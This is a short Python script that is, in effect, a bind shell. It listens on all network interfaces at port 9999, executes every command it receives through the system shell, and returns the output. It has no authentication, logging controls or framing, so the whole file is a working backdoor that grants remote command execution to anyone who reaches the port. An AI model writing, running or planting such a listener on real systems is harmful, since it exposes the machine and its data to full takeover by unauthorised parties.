import socket
import subprocess

def execute_command(command):
    try:
        output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        output = e.output
    return output

def server(host='0.0.0.0', port=9999):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(1)
    print(f"Listening on {host}:{port}...")

    while True:
        client_socket, addr = server_socket.accept()
        print(f"Connection from {addr}")
        command = client_socket.recv(1024).decode('utf-8')
        print(f"Command received: {command}")
        if command.lower() == 'exit':
            client_socket.close()
            break
        output = execute_command(command)
        print(f"Output: {output.decode('utf-8')}")
        client_socket.send(output)
        client_socket.close()

if __name__ == "__main__":
    server()
